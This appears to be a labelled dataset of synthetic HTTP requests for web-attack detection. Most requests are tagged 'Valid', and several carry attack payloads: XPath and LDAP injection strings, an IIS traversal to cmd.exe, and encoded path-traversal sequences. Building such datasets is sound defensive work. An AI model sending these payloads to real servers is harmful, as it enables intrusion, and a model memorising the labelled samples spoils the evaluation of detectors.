Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 181.111.92.64
X-Serial-Number: 545829621
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3148
Start - Id: 10804
class: Valid
GET /sh/iaTQd2.50u./.uA95hSt@_LO/tFoKqTknTfJs1y8oDv/ieq-/Salored/0rhaqhma.msf?irlnc=a6dijS&nFade4t2e=diovt&dTesse0f=s0y&cs7O6Hhse=1219946&K20UOWTt6=916251&ahihYgw3eiillge=puZOT-ehazY&SRNeWe=amitelnetco%268&sBXopt8=fOgYQp3GPo&IYKX4XbhS=badhi HTTP/1.1
Host: 247.176.48.214:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: 9tniiLet-tsiqkt, ed-a;q=0.0, oi-ancwub;q=0.0, 6jibxnrc-Ite
Cache-Control: x=staow93
Client-ip: 195.254.67.11
Cookie: VaRzgC_tqT=execgts;P3l0laslttnueze=%telnetb$;Tssuptarhe=nninclude ]]sm trx%ue;bt=eogxqAMV;GGinputDOFO0B=9057670;adtnsti3=ceatelnetacceptaYnnlocatione
Cookie2: $Version="9"
Date: Wed, 28 Jun 06 19:09:10 UTC
ETag: "sCnS6DDl9kuZb-fBjz"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Tue, 31 Aug 04 01:05:21 CET
If-Unmodified-Since: Sun, 18 Oct 09 12:33:06 GMT
If-Match: *
If-None-Match: "6B5AZ.GfuRjsDNKXzXv"
If-Range: Sat, 09 Jan 10 14:39:27 CET
Max-Forwards: 0918
MIME-Version: 5.1
Pragma: erricsaO=iaal
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: c1wo racr=teRzm
Range: -605203
Referer: /hvrhzn/r5tzienv/1ehs/Cyoeas/rtlm3ir.gif
TE: deflate;q=0.3,deflate;q=0.9
Trailer: Referer
User-Agent: Tzec (iFExk1Xh@; a8zumFl; mCoTta)
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4636x443
Via: 4.6 238.180.144.45, 7.8 225.8.237.62:77745
Transfer-Encoding: deflate
Upgrade: dfeo/3.1, 4aehpf/3.9
Warning: 951 140.118.229.134 "esuyiiii5XtSsn4ie8" 
X-Forwarded-For: 44.92.107.214
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10804
Start - Id: 32469
class: Valid
GET /5rbaaIi7tgmoouE/agJrj78/r7T9FQt1/vhF/saEenlebnqbpLm/tkwMQkruformXKboot.iniVlU/sX9M1lzMgXimCCXmQckx/mUbSXeaoguddlipti4u/Rjnx@PawOL0/hcd/dis.msf?4hl=ssm&7NDftpK2GY=ytiqF4&ghe=so6Snwindow.openos%24opuh%2Fego%5Db&91t=rr7reyeam&trhh5=%28irifoqedms&jmbP=nf4IZjqRQ9P&othEus=uzoouh1&wwirL=dn7+s%5Cbniae0Cwindow.opensyin+h%3C&um6k=AN+aunion&chnsievrc=%240ape&Anehdxaqnt=tdiipn&neeatd=757 HTTP/1.0
Host: www.ihdto.net
Connection: bekTt
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: compress, gzip, deflate, compress
Accept-Language: gh8ogrod-1ilr;q=0.5, s5vnehDn-neta, lts-Ii, olw-dnnhkP;q=0.4
Cache-Control: min-fresh=4
Client-ip: 93.135.40.113
Cookie: lie=6102;lqTR2P2=zbAhslalnnuenaissn;dao=at3nat;ateenzkiNN8=eartbepwoh;la8rygdk=1792969;hdiAihnatrat8so=Uer1jln9Ddonuiawj
Cookie2: $Version="9"
Date: Fri, 03 Sep 04 04:29:35 CET
ETag: W/"Phb_CuN3CBeWzEnJ0F"
Expect: 100-continue
From: gmteT8ev@mrqx3tteu.net
If-Modified-Since: Wed, 08 Apr 09 04:33:01 UTC
If-Unmodified-Since: Wed, 23 Nov 05 22:17:46 UTC
If-Match: *
If-None-Match: "B-QZbiQ-l5eCZ9R6nl"
If-Range: "-w@Zs5BQ3Ot-ZFAhC0"
Max-Forwards: 5
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="mteECta"
Authorization: NTLM aHJucnBoYmx6dGFtbklzaG5uZWVZaUNvaWg0b2JjY25ldGVhQQ==
Range: 31-,-9
Referer: /hsrk.asmx
TE: chunked;q=0.6,deflate
Trailer: If-Unmodified-Since
User-Agent: j08o (nY2iEsbz; meDETDF)
UA-CPU: MIPS
UA-Disp: 1956,0325,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x3717
Via: HTTP/0.8 www.ilaayet.html, FTP/1.9 www.cnxsrlt.html
Transfer-Encoding: dneh
Upgrade: ternt/2.2, gvhrO/1.0, 2n4E3h/6.6, 5tnucz/1.4, tsojiD/3.4
Warning: 045 www.jVoAw.htm:318 "Wteirsteatrhje7brwtl" "Thu, 17 Sep 09 15:24:18 UTC"
X-Forwarded-For: 171.216.17.6
X-Serial-Number: 31593732
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32469
Start - Id: 48384
class: XPathInjection
GET /DB9Vb.OwT8@NSvar/as/oohsiiEmgac/wAiirdgc5N2oa.css?chigOe3dtrna=SsacqOneeR%24m+oziframetsps&jllnsh5Sep=7260&i0ShDol=299228477&unuoyd=qH6sous&ehie=9mroled HTTP/1.0
Host: 215.210.136.238:12
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cookie: w0rsAstpoh4f=km2j@;teentt=Intzhnsaitna;uZzxG_-@R=7831861
Date: Thu, 09 Jul 09 23:55:13 UTC
ETag: "SNx63HG6FjktKa2"
If-Modified-Since: Fri, 12 Sep 08 24:50:32 CET
Referer: /vn9au/ejfs/maeeme/sasoifi.nsf
User-Agent: (i     <     count(oen/child::text())     and j     <     count(nr/child::comment())  and  k   < count(oer/child::*)    )
UA-Color: color8
Via: FTP/5.0 132.236.213.37

null

End - Id: 48384
Start - Id: 32403
class: Valid
GET /wBgP@2/ftg7rwYmoS.png?stO08Eki=s6z HTTP/1.1
Host: www.nnmlzfEasa.cz
Connection: keep-alive
Accept: application/*;q=0.0, application/rtf, text/plain;q=0.4
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: sEnswsn-ei;q=0.7
Cache-Control: ewn=ag
Client-ip: 241.94.253.141
Cookie: CfuJSOj1=nesRdrmdiieltyw;haN=a;eO=h
Cookie2: $Version="672"
Date: Mon, 22 Dec 08 12:46:48 CET
ETag: "CKbIO1VjQVwE@Kz"
Expect: 100-continue
From: itad@eosuny.org
If-Modified-Since: Fri, 14 May 04 02:31:17 UTC
If-Unmodified-Since: Sun, 28 May 06 18:37:45 UTC
If-Match: *
If-None-Match: *
If-Range: "eePKelkpjkut3VGH"
Max-Forwards: 5
MIME-Version: 9.2
Pragma: P='ooutc'
Proxy-Authorization: NTLM cXI0cm92enJpdWFsNmtnMWN5Y3Nsd2l0NDduZWVlZXJuZm9l
Authorization: nrEt AUAytbne=Ttooea
Range: -042,6-433,-046553
Referer: /dtsvSesf/inueg/iMosaeh.dll
TE: gzip,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.1 (X11; U; Open BSD i586 3.3; rp-yi; rv:6.4.0) Gecko/29117385
UA-CPU: MIPS
UA-Disp: 599,7956,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 441x524
Via: 8.0 117.161.236.62, mebh/3.4 www.yin3nr.css
Transfer-Encoding: identity
Upgrade: wrt/4.4
Warning: 300 www.aR5tt.jpeg "hDge" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 2700091210
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32403
Start - Id: 1940
class: Valid
GET /i.xDnVsMRDKACqcp7/ctss3mu5fhhe6ee/bX5jqy9G3kKHVCNci.png? HTTP/1.0
Host: 234.6.130.16:80
Connection: close
Accept: text/*, application/*;q=0.2
Accept-Charset: windows-1255;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=74994
Client-ip: 191.148.220.19
Cookie: oaexLmcvuin=40540859;goridnerL=on;ewlu4edntel=4Naacadnr
Cookie2: $Version="884"
Date: Mon, 25 Dec 06 15:39:27 GMT
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: r6od=urssnn7;cduho=rrd5a9es
From: fyihtnev@d3neOnni.cz
If-Modified-Since: Mon, 11 Jan 10 09:26:02 GMT
If-Unmodified-Since: Fri, 21 Jul 06 17:24:11 CET
If-Match: "07eM0tl-_@yhCPdTIVO"
If-None-Match: *
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 2893
MIME-Version: 1.0
Pragma: tees='Eul'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: 8erMn usNE=cpeNs1
Range: -8,9401-9800,-599
Referer: /snSj/seeqaoO.css
TE: trailers
Trailer: Date
User-Agent: Mozilla/6.1 (Windows; U; WinNT 2.7; xO-sl; rv:0.8.0) Gecko/42472378
UA-CPU: Sparc
UA-Disp: 0367,7065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: HTTP/8.7 25.143.160.68:03, 3.2 171.225.176.9
Transfer-Encoding: identity
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1940
Start - Id: 2074
class: Valid
GET /Plmobject9woya5B/AiwAa6etucdlnf/eahaa1aelqQfsmIn/eRm1T9WeWzKmVbYBE/rSc3k8Cwk.bin?albe8eht5=h0eotK%7C5coo+md&an4itpwbe47=copyasq&WP0CaO8mC0=dNwwr2O&fliEr0Reesilu2c=069556&46VOE@C.=nwreplacenaefusa&uh9bH=9147081&eheio8znafdget=Rnbds%280irdcq%27Q&nlwi1n=56&DFe29qnteoT=iebo1&me=ni&nr79=aatoassvle&ieoPdmar6msngbp=x%3Bolwses%28eInuf&Lhg5axu=gaabodyra&JWMWprocessing-instructionQ.1@68R=607550&hbaibeYtt=lognaee11eu+66z HTTP/1.1
Host: 2.213.41.193
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-kr, macintosh, euc-tw;q=0.5, cp-936
Accept-Encoding: deflate;q=0.4
Accept-Language: wh8n-tedeor;q=0.2, l3ysemsr-eo;q=0.0, a-niE;q=0.0, Fi-3cs8B, wuy-naE0aoio
Cache-Control: max-stale=803
Client-ip: 20.25.68.136
Cookie: w7otmtdkkAetlid=1
Cookie2: $Version="031"
Date: Tue, 30 Oct 07 12:40:15 UTC
ETag: "7rLVAXiP8RA-qwTqv_Y"
Expect: xglpw
From: Iosu@aert5hd.ch
If-Modified-Since: Fri, 04 Sep 09 10:07:19 UTC
If-Unmodified-Since: Wed, 18 Feb 09 13:28:23 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 06 Jul 05 16:59:35 UTC
Max-Forwards: 8
MIME-Version: 8.8
Pragma: nasr='tElTQnca'
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Digest cnonce="oeRSa4g"
Range: 703917-,4853-42336,855-
Referer: /3a8t/owwEe/tt6it/ieaay/zeCwsm.swf
TE: trailers,gzip
Trailer: TE
User-Agent: arfuliooyi
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9053x775
Via: edas/2.6 225.227.6.38, 7.4 170.98.38.90
Transfer-Encoding: compress
Upgrade: hli/9.0
Warning: 400 160.120.60.102 "ocuetceo" 
X-Forwarded-For: 11.193.20.253
X-Serial-Number: 8755848489849428552
----: ----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2074
Start - Id: 9109
class: Valid
GET /e5eT7iphccitvoi/rwyblEdEIjldAdAREbH-/sc3LQllYVaPi/phtresyn/3D/bgsoundLXC/e3t.jsp?torwpst9=21615550&smenehsa3xizn=dewi&ublgs=aiggAT9gUQWM&anceclliUbgundn=%7E8a%5C&nDssei=2&pwro9q=27701&te=8&HhgIaeF=jzs&xhtLhe1xs=o8vrs&RcatfXVJ=gsees&negue=iy8bserb HTTP/1.0
Host: www.6sOeZg8u.it
Connection: tdnoske
Accept: video/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.0, gzip, compress;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 23.64.59.93
Cookie: diilqDp7w=ri iaecn0% uoptrn;nsatAa=Eonsol<feznetches;DswJWhLlikedelete=3853293;ie=iePoSU+;e
Cookie2: $Version="40"
Date: Mon, 30 Apr 07 12:37:51 CET
ETag: "V6QvKH2naWZH6U2b"
Expect: 100-continue
From: eo0inrr@xinaejal.fr
If-Modified-Since: Mon, 07 Nov 05 15:17:15 GMT
If-Unmodified-Since: Thu, 03 Dec 09 23:25:20 GMT
If-Match: "adrXP9bxptA6YHCGYq"
If-None-Match: *
If-Range: Mon, 09 Nov 09 02:30:27 UTC
Max-Forwards: 41
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: arcr arreu=axeMtee1
Authorization: Basic cmw0YnJ5dHQ6cmVkc3JNeg==
Range: 6496-56287
Referer: /hB9ra/Shcvnm/abuel92g/uRbpHlin.cgi
TE: gzip,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: eBn1xX@AKJ http://www.eshabi.be
UA-CPU: StrongARM
UA-Disp: 6130,9479,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9463x953
Via: eoe/5.5 www.pefisp.tiff, 5.8 www.retmRdk4.gif
Transfer-Encoding: gzip
Upgrade: nAzm/6.2, yh8o/8.1
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 91261619924
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9109
Start - Id: 35783
class: XPathInjection
GET /xdyteda8ndidaqtEnsay/c-/Arws2dma3eaO1oi.tiff?rPr2eOt7toal2II=qclr%27+++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++%27rhaqart%27+++%3D%27 HTTP/1.0
Host: 150.98.81.180
Connection: re3Wene
Accept: */*
Accept-Charset: iso-8859-1;q=0.2, windows-874;q=0.5, x-mac-chinesesimp, iso-8859-6
Accept-Encoding: gzip
Accept-Language: womf-o1cai;q=0.2, t-tIzont, Naor-etcsrsCi;q=0.6
Cache-Control: no-cache
Client-ip: 200.26.183.185
Cookie: bgawioryanqi=teg\os rci;Esro=89210;rreerp=168
Cookie2: $Version="851"
Date: Wed, 06 Aug 08 23:33:19 UTC
ETag: "Svs2sVNwEB_MZhVF"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: debl@hectstms.net
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Sun, 25 Nov 07 19:13:50 CET
If-Match: "CLGYTEeTI8-h2dVGGjt"
If-None-Match: *
If-Range: "QIRjJ2u8Cu8U_xf74kjY"
Max-Forwards: 9
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Basic bmF3c3dpWTo0b3ltZVY=
Range: -777
Referer: http://q7oieo.st/osD4/loasr.dll
TE: trailers,deflate;q=0.8
Trailer: If-None-Match
User-Agent: rhbes2/5.2.9.8
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 072x540
Via: 1.7 www.oEEgSee.shtml, FTP/6.0 67.219.68.118
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 506865883977236095
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35783
Start - Id: 14918
class: Valid
GET /6kmXcTaccess_log3CFgfH/N@eb/eZBra5xUkNXBXXK_gg/r1hUIesruZXgcT/gaO94sbQlBp.4UKz/ziQ-k34bmxjTv/63U8UW8EHrhU.jsp?hEl8tu=5&sbrlNo6l6z=8om&0atnwh=%5D+h%3Ess+oonhTtet%3As%3A%275&h2=+Ebzservicesut%24++&tsslwipuce=570&onblmhosjaiir7h=037&access_logoUghJL0=211115&usacnNStnhL2da=1n88meree&zsiee4=749&6GWc=0 HTTP/1.0
Host: 255.247.87.160:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, deflate;q=0.6, compress;q=0.8
Accept-Language: wmoe-yi, l3e-j, tz-nnimep;q=0.8, T3fN-hpln;q=0.1, gufows-mmkuhfd;q=0.2
Cache-Control: max-stale=87390
Client-ip: 72.62.132.226
Cookie: deeAietl=ieteN;myet=raT;Omrtadleapelg=ws9T;seaiy=al;nn=)s(E
Cookie2: $Version="2"
Date: Thu, 27 Oct 05 16:03:00 CET
ETag: W/"C.op4bkdD0SXjTPopP"
Expect: 100-continue
From: nins3ase@bcmaa.ch
If-Modified-Since: Mon, 01 Dec 08 11:54:30 GMT
If-Unmodified-Since: Mon, 23 Nov 09 21:45:08 GMT
If-Match: "s@Fad7PNfQxAzRhu"
If-None-Match: "X-2qCWZd0ja8JuSd7gV"
If-Range: *
Max-Forwards: 5173
MIME-Version: 1.4
Pragma: ys='czntSu'
Proxy-Authorization: Digest cnonce="dDhsmu"
Authorization: Basic bzdjaEl3bjp0Y1VlcQ==
Range: -14906,6-959
Referer: /O8ahRh.txt
TE: trailers,trailers
Trailer: From
User-Agent: 5_RtGmg http://www.tbst.fr
UA-CPU: PowerPC
UA-Disp: 509,721,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: 6.2 143.179.62.105:3, 8.6 www.wem1eaqD.tiff, 5.4 www.EeyihiiT.css
Transfer-Encoding: compress
Upgrade: Hlt/0.3, j5p/9.9, ouktu/7.8, yeiroi/9.1, hPi1/6.2
Warning: 194 www.rm0lai.jpeg "gocxkLhNTt9pfsEbecg" 
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 580548431954980
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14918
Start - Id: 8342
class: Valid
GET /rgcQlsrd/svxo3gAU/etoaaBe5Ctso7rwef/hallZfzKw9/dihUwzgewVV9Etj/rorgr7antoliev/h3z7bEg.shtml?c1etdsjr7=nue&xwibn2sr=40&fdwnE0child12N=3inserthrnotohaccess_log&0-WtDU=m93jHi&Umaiabwp-PD8=hnnehi3wejecke&arel2seuc=oxdn&9osr=gcfhfl&c8oteeAwdyjlsm=wn7Dena&1QMgperlhttpr=a&ddMehheL=36188 HTTP/1.1
Host: www.oN2b.net:39
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.3, windows-1251
Accept-Encoding: *;q=0.5
Accept-Language: hxITns-te, eih-m9uvt;q=0.1
Cache-Control: jfteS='1psrt'
Client-ip: 172.94.100.229
Cookie: e7toe=gbineu;97P0between=42168;ts=t liqmehtoptlexechyQaaaS;ss=icaaaat'soa2ws;cJQWvKDZSG=hGe3e;bs8ermreehh=nitDrctenhtpassadt
Cookie2: $Version="005"
Date: Sat, 31 Mar 07 07:13:28 UTC
ETag: "qMVP-7z34MY8pTEB9"
Expect: seuaew=o6h5lRin
From: nxc9@6foevslczn.com
If-Modified-Since: Tue, 20 Oct 09 14:07:58 CET
If-Unmodified-Since: Thu, 02 Mar 06 12:03:12 UTC
If-Match: *
If-None-Match: *
If-Range: "pyfdY31RKZdI2r@z_lC7"
Max-Forwards: 0435
MIME-Version: 9.6
Pragma: nqre=ebelef
Proxy-Authorization: b5yes eadxakvc=hhuta
Authorization: Digest algorithm=MD5-sess
Range: -2465,620-
Referer: /3osiNr.tiff
TE: chunked,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/7.3 (Windows; U; Win98 6.5; 2t-us; rv:0.1.1) Gecko/95443960
UA-CPU: PowerPC
UA-Disp: 7385,2765,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 253x499
Via: 6.3 www.deyct4tt.tiff:6, FTP/3.1 97.130.196.128, 0.9 www.uaopaNij.htm
Transfer-Encoding: identity
Upgrade: o3ee/6.3, yidAr/4.8
Warning: 629 111.149.129.27 "tdrbdodentEsntEwoXo" "Mon, 12 Apr 10 19:02:50 GMT"
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 482816
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8342
Start - Id: 38232
class: LdapInjection
GET /oC_3m6WKAgvZ1SL0fPOJ/1MbOaIE/rlrmru5yEasDeRStrto/9Yere1n9siunre/K0JuPLoc@1.png?nirtjve=c%296ttidbbaomaall4&hs=3ecl2Rnpshyert&Dstliiaoca=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&snt=288&hmctLo=shutdownr5reslroj%28rcprfs&NRykoettsoeoree=t4%2B%5DRa8&Dvsock_streamIS=n5metaftE HTTP/1.1
Host: www.sta8.uk:760
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: eo-I;q=0.1, ominhi-BhiRl0, am-woco5H;q=0.7
Cache-Control: e8bHdo='on'
Client-ip: 63.201.6.101
Cookie: Gdgs3e-r-=DuCltaPasca;eYtoep9csHiE=oi6q
Cookie2: $Version="541"
Date: Fri, 11 Feb 05 15:05:37 UTC
ETag: W/"pNPv_Emey7cK.eo-"
Expect: PCps
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Mon, 03 Dec 07 13:01:25 GMT
If-Unmodified-Since: Mon, 27 Sep 04 20:43:40 GMT
If-Match: "3nsYqJH_6IwPY.6A"
If-None-Match: "mNBe@xPBirAXBjwl"
If-Range: Thu, 15 Nov 07 10:45:16 GMT
Max-Forwards: 27
MIME-Version: 6.4
Pragma: yxaB6oui='iOp'
Proxy-Authorization: Digest opaque="grhibe"
Authorization: NTLM YnRvc2ZodmFhZXFodHNpcmRyb2NhaWVhS2VpcjdubHJlMA==
Range: 287-97,69886-3057,-02739
Referer: http://hnn21nw.com/ycII/lCccd8r/laaeT/twW5T.pl
TE: trailers,deflate
Trailer: Connection
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 3.4; da-71; rv:9.8.7) Gecko/11947263
UA-CPU: StrongARM
UA-Disp: 388,3742,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: HTTP/8.6 78.251.107.205, 8.2 www.gij7.html, 7.0 182.241.170.96
Transfer-Encoding: compress
Upgrade: gcslf/0.5, byhs/2.3, tt7d/1.7
Warning: 920 www.armnloNu.jpeg "lujsutbdernTs5fsCbd" "Mon, 09 Feb 04 05:55:11 CET"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38232
Start - Id: 36556
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.ianN.biz:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: h-36LJme1;q=0.4, LTpnoLe-ubN;q=0.0, deSte-t0h, 5p-6ybs;q=0.8
Cache-Control: no-store
Client-ip: 197.131.59.208
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="25"
Date: Sun, 18 Apr 04 07:06:51 CET
ETag: "._sHr99T4AKY.QbUteoU"
Expect: ft7A=n8gttEd;crsu
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 12 Nov 06 19:21:23 GMT
If-Unmodified-Since: Sat, 26 Apr 08 23:56:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 5.7
Pragma: Q='faaoepns'
Proxy-Authorization: Digest nc=Ad95328B
Authorization: NTLM cmlvb2Fvb2luaGRzaGp0czdvd2xvYWhrNDR0Z2VhbGEwYXppdGk0Ym5kc2tB
Range: -7292
Referer: /retip/ssus/efaw/aLfat7tb.pdf
TE: deflate,gzip;q=0.0,gzip;q=0.3
Trailer: If-Match
User-Agent: zSae (hg.uZlGm4y; fEJG-42Dg9; ralYWe8hM)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 547x5195
Via: enogs/8.6 www.tetqra.jpg:2, 3.7 196.40.24.71, 6.1 www.2pocs.jpeg
Transfer-Encoding: identity
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36556
Start - Id: 44636
class: PathTransversal
GET /wTqsoqtTautoexec2/dhYCT.7/htw3/10ugg18l4hxpidYDCXD.mdb?aqseygHolIf7nse=ioe&He=%7E%28anbetweenoshutdownA+e4chttpseoai&fsn2iis=fr&easmwEetnzb=7405825&nmttuoAu8g8t=966&gs=aN9Lt4ehvbscriptts&uettpt6tdtit0=E0m&soniTrNcH=6740&j5indrnna7z6=4364 HTTP/1.1
Host: www.nladlthd5p.ch
Connection: ibsxeliy
Accept: image/jpeg
Accept-Charset: windows-1251, iso-8859-7, iso-8859-4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 95.91.76.121
Cookie: sW8k7=r&Rttform~keemeusror8cgE;9istiddu=nHxJs8;1tt=eztcaboreasAdz6r;t3oqo8s=4873;tpk=613
Cookie2: $Version="462"
Date: Thu, 11 Sep 08 11:20:07 GMT
ETag: W/"nVNfmxUs_zLYAmO"
Expect: eiy131a=dtnm7oi;qnia
From: fsdIshc@oassmaqEaj.fr
If-Modified-Since: Wed, 20 Feb 08 22:37:15 GMT
If-Unmodified-Since: Fri, 27 Oct 06 09:39:01 GMT
If-Match: "pWhLhTRvMES.Yk4fQP"
If-None-Match: *
If-Range: Sun, 18 Sep 05 01:43:08 GMT
Max-Forwards: 6
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic ZXVibmw6dGVybnI=
Authorization: oae6u ikoaig=ulh0yi
Range: 88225-6,-77072,9402-6
Referer: http://estdN.de/c0hd/lawIWe/3l7iljcm/n6sntk7c.gz
TE: trailers,chunked;q=0.6,trailers
Trailer: Trailer
User-Agent: %2e%2e.\%252f/\%252f/...\%252e..%2e
UA-CPU: PowerPC
UA-OS: FreeBSD
Via: 8.3 www.osriegi.png:14
Transfer-Encoding: identity
Upgrade: li4Qh/6.8
X-Serial-Number: 616147525
----: -----------------------------------

null

End - Id: 44636
Start - Id: 13782
class: Valid
GET /jx0fkYselectvmxZt/ioM/n@zQ5-7OUmU/aa6weui7Ne2u1csgstsr/rz8cDT7q5tUZA7jk@nW/1fttnnusiootte6/mX0/4Y_.jsp?eeiqtt=7747094&lkettcihth9tT=dnPg3olls2aTw&ergadne2ml6eqe=re+cbgsounds%40ahtaccesl&3B_zMh2group byp=40051945&lz=65341130 HTTP/1.1
Host: www.Clni5ieRy.cz
Connection: SgUEi
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: heX-tNmrsu;q=0.2, rxmho7-hp;q=0.8
Cache-Control: ceea1i=sifi
Client-ip: 127.177.149.169
Cookie: ae3gsscohawo=5275234
Cookie2: $Version="6"
Date: Tue, 19 May 09 23:58:03 UTC
ETag: "hN05NJsSrpN0per2"
Expect: 100-continue
From: kaat@losa.de
If-Modified-Since: Sat, 06 May 06 08:54:20 GMT
If-Unmodified-Since: Thu, 30 Aug 07 21:43:28 UTC
If-Match: *
If-None-Match: "chQuViPMTP71g_4"
If-Range: *
Max-Forwards: 634
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic bXRTczphaGFwVA==
Range: -1636,47220-,49348-
Referer: /rsors/ecnEbm/ikeu1r.html
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.4 (compatible; dxsEdm; Solaris; sxwaieAn)
UA-CPU: x86
UA-Disp: 709,7535,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 311x7521
Via: 6.1 www.ftp1wy.tiff:5
Transfer-Encoding: gzip
Upgrade: ssee/8.4, tag/6.0
Warning: 340 12.142.158.70 "icncsoww5Yi" 
X-Forwarded-For: 231.109.137.254
X-Serial-Number: 26172268
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13782
Start - Id: 32616
class: Valid
POST /zQplqJJz/nnatgrfc7fy/rSK5VI_/r@KomSWn/etefaRRoaztbdcret.js? HTTP/1.0
Content-Length: 20
Content-Language: ber25naa,gel9Aosa,rhzis2h
Content-Encoding: deflate
Content-Location: /iefsrtb/tettR/ldsz/taax4gei/ewo96h.tiff
Content-MD5: b2VuaGJtdGVlYWZyZWFSdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 May 05 21:55:41 GMT
